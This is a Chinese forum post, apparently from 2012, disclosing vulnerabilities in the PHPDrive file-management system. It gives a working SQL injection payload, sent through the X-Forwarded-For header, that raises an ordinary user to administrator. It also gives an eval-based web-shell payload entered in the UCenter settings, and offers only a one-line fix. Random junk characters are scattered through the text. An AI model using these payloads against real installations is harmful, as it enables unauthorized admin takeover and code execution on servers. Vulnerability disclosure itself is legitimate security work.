PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
, Z" |) H9 b5 V) h( l# v: d- K
' E6 O, R9 A8 Z9 Q0 o( m" r) K% M% K7 V$ Sincludes/user.lib.php
. }. R% X& l4 }) ]行875 `5 p# R% t* B/ C e- W
function get_ip() {% a- t, O/ U, ~; Y
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.6 x3 `. ] T9 z
在用户注册与登录 处module/disk/account.lead.php: }: b' Y% M" G& t
198行
* ?' I4 \5 q, f& @/ \4 [$ ~* r //更新本次登录IP和时间6 q3 k* e+ l8 L
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生+ J; c$ I4 S. ]0 _7 r
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
7 L- _! r! n* k' L' \实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
$ y3 G+ g) C3 C7 `, F后台getshell:& J% k$ X0 | q' {( a$ S
在UCenter设置处,将UC数据库登录名填写为; e1 ?' w" X" b9 u5 p
, X( q, T3 b% g9 ]root’);eval($_POST[DisKill]);?>/*5 h! s) r* V1 K2 j: k
可以得到一个shell,位置在 data/uc.data.php% `1 {0 \- V; V1 q
( z! _6 K2 k- a' i3 s C修复:过滤注入
2 P/ v& k; w6 H2 d5 Y) A* V6 w+ t' J9 R
|
发表于 2012-12-31 09:18:34
收藏
支持
反对